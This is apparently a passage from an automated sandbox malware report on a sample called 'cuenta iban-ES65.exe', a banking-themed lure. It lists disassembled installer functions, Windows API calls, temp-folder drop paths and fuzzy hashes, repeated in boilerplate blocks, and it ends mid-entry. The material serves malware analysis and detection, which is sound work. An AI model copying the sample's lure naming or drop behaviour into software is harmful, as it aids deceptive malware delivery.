Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c60a5741adf6fd17905679b15365177ec5dfd851c523a537735145c0d793b3ca
Instruction ID: bce073d95cda9f80ae5a70f3258e8641f0ad27ed80faf677ac8523eeabb20274
Opcode Fuzzy Hash: c60a5741adf6fd17905679b15365177ec5dfd851c523a537735145c0d793b3ca
Instruction Fuzzy Hash: F7B09235585200AAEA224B40DD09F457A62A7A4701F008064B210240F0CAB200A0DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004030A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,00032BE4), ref: 004030B2

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00403F13 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403CF0), ref: 00403F1D

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 0fd0461592f2d81c1c03ce05c628ae056ab63dad8406c1f23e4af249cfc5fe4d
Instruction ID: 7c635d8461ea366e4ce50998120561f43c0f0a4d26a99d582f7a8baadb7aa675
Opcode Fuzzy Hash: 0fd0461592f2d81c1c03ce05c628ae056ab63dad8406c1f23e4af249cfc5fe4d
Instruction Fuzzy Hash: 98A00176808101EBCB029B50FE08D4ABF62ABA4709B12D426E25594174D6365871FF2A

Uniqueness

Uniqueness Score: -1.00%

Function 004057A9 Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,004031D7,"C:\Users\user\Desktop\cuenta iban-ES65.exe",00000020), ref: 004057B6

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
Instruction ID: af04ccf7b047eddc6f07bfa5d2d4e993f0f495a442af33782379f12d099718e5
Opcode Fuzzy Hash: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
Instruction Fuzzy Hash: 35C08C2850D780E7E6214720802496B7FF4EB92700F68C4AEF4C1A3251C238AC00AB2B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040432F Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040437E
SetWindowTextA.USER32(00000000,?), ref: 004043A8
SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 00404459
CoTaskMemFree.OLE32(00000000), ref: 00404464
lstrcmpiA.KERNEL32(Call,0079E540), ref: 00404496
lstrcatA.KERNEL32(?,Call), ref: 004044A2
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044B4

Part of subcall function 004054E6: GetDlgItemTextA.USER32(?,?,00000400,004044EB), ref: 004054F9

Part of subcall function 00405F77: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\cuenta iban-ES65.exe",77303410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FCF
Part of subcall function 00405F77: CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
Part of subcall function 00405F77: CharNextA.USER32(?,"C:\Users\user\Desktop\cuenta iban-ES65.exe",77303410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FE1
Part of subcall function 00405F77: CharPrevA.USER32(?,?,77303410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FF1

GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,00000001,0079D510,?,?,000003FB,?), ref: 00404572
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040458D

Part of subcall function 004046E6: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404784
Part of subcall function 004046E6: wsprintfA.USER32 ref: 0040478C
Part of subcall function 004046E6: SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F

Strings

@y, xrefs: 0040442C
A, xrefs: 00404452
Call, xrefs: 00404490, 00404495, 004044A0
C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet, xrefs: 0040447F

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: @y$A$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet$Call
API String ID: 2624150263-2851418435
Opcode ID: 4367221acb27fbafda39f30d3b729b6150a881a92f1b2ab0f00bcccaea6e9431
Instruction ID: dc70ebfb722856edf20ca9fe518129045a13840cef36c67e0ec65d3b8ea71268
Opcode Fuzzy Hash: 4367221acb27fbafda39f30d3b729b6150a881a92f1b2ab0f00bcccaea6e9431
Instruction Fuzzy Hash: 69A182B1900208ABDB11EFA5DC45BAF77B8EF85314F10843BF601B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
GlobalFree.KERNEL32(00000000), ref: 10001BCC
GlobalFree.KERNEL32(?), ref: 10001CC4
GlobalFree.KERNEL32(?), ref: 10001CC9
GlobalFree.KERNEL32(?), ref: 10001CCE
GlobalFree.KERNEL32(00000000), ref: 10001E76
lstrcpyA.KERNEL32(?,?), ref: 10001FCA

Memory Dump Source

Source File: 00000000.00000002.13169077201.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.13169049421.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169106504.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169135539.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_cuenta iban-ES65.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189

Strings

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82, xrefs: 0040211D

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82
API String ID: 123533781-3628409291
Opcode ID: 242605dd3021b9dd3d625f3e37deec10c9ff713f063c09ff5835f8ca8ab74a70
Instruction ID: 14d4926e91d078e82bebccc5f6ab74bc99395aff19d04a9878b07c190defc42e
Opcode Fuzzy Hash: 242605dd3021b9dd3d625f3e37deec10c9ff713f063c09ff5835f8ca8ab74a70
Instruction Fuzzy Hash: 9D513871A00208BFDB10DFA4C988A9DBBB5FF48318F20856AF515EB2D1DB799941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: caea3b9b5083208269277406012316af798426384357970767d8f37829e133fd
Instruction ID: 693c9160ce4d260d62fecbf2f45a0834f3a8ccba4a644e55fc62545b2e120305
Opcode Fuzzy Hash: caea3b9b5083208269277406012316af798426384357970767d8f37829e133fd
Instruction Fuzzy Hash: F9F0A0335081509FE701E7B49949AEEB778EF61324F60457BF241B21C1D7B84A84AA3A

Uniqueness

Uniqueness Score: -1.00%

Function 0040403E Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 209windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040C5
GetDlgItem.USER32(?,000003E8), ref: 004040D9
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040F7
GetSysColor.USER32(?), ref: 00404108
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404117
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404126
lstrlenA.KERNEL32 ref: 00404129
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404138
SendMessageA.USER32(00000000,00000449,?,?), ref: 0040414D
GetDlgItem.USER32(?,0000040A), ref: 004041AF
SendMessageA.USER32(00000000), ref: 004041B2
GetDlgItem.USER32(?,000003E8), ref: 004041DD
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040421D
LoadCursorA.USER32(00000000,00007F02), ref: 0040422C
SetCursor.USER32(00000000), ref: 00404235
ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 00404248
LoadCursorA.USER32(00000000,00007F00), ref: 00404255
SetCursor.USER32(00000000), ref: 00404258
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404284
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404298

Strings

N, xrefs: 004041CB
Call, xrefs: 00404208
open, xrefs: 00404240

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open
API String ID: 3615053054-2563687911
Opcode ID: 8c7660a1074f8cb6d1383d3618f78b63f44fca30b1110a90338399f7eed407ba
Instruction ID: 365aca7fae6311fbc7e4e8c2686ffc250e9360cc14ea5d98b2bb72e1e6895f9c
Opcode Fuzzy Hash: 8c7660a1074f8cb6d1383d3618f78b63f44fca30b1110a90338399f7eed407ba
Instruction Fuzzy Hash: F371D4B1A40309BFEB109F60DC45F6A3B79FB85744F10806AFA04BA1D1C7B8A951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00405A55 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405BE8,?,?), ref: 00405A64
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405BE8,?,?), ref: 00405A88
GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405A91

Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926

GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405AAE
wsprintfA.USER32 ref: 00405ACC
GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,?,007A06D0,?,?,?,?,?), ref: 00405B07
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B16
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B4E
SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA4
GlobalFree.KERNEL32(00000000), ref: 00405BB5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BBC

Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\cuenta iban-ES65.exe,80000000,00000003), ref: 00405983
Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5

Strings

NUL, xrefs: 00405A5E
[Rename], xrefs: 00405B36, 00405B48
%s=%s, xrefs: 00405AC2

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: a98d0c62792372129b5cc65dd148cc0d3d8b8a17ed91fd97a1a79d4ea906e530
Instruction ID: 28628270b370f13d709f2e98436788b9d19fd6dde28ce54c0a079e884eb7da61
Opcode Fuzzy Hash: a98d0c62792372129b5cc65dd148cc0d3d8b8a17ed91fd97a1a79d4ea906e530
Instruction Fuzzy Hash: 5A311371605B18ABD6206B215C89F6B3A6CDF45764F14013BFE01F22D2DA7CBC008EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405F77 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\cuenta iban-ES65.exe",77303410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FCF
CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
CharNextA.USER32(?,"C:\Users\user\Desktop\cuenta iban-ES65.exe",77303410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FE1
CharPrevA.USER32(?,?,77303410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FF1

Strings

*?|<>/":, xrefs: 00405FBF
"C:\Users\user\Desktop\cuenta iban-ES65.exe", xrefs: 00405FB3
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F78

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

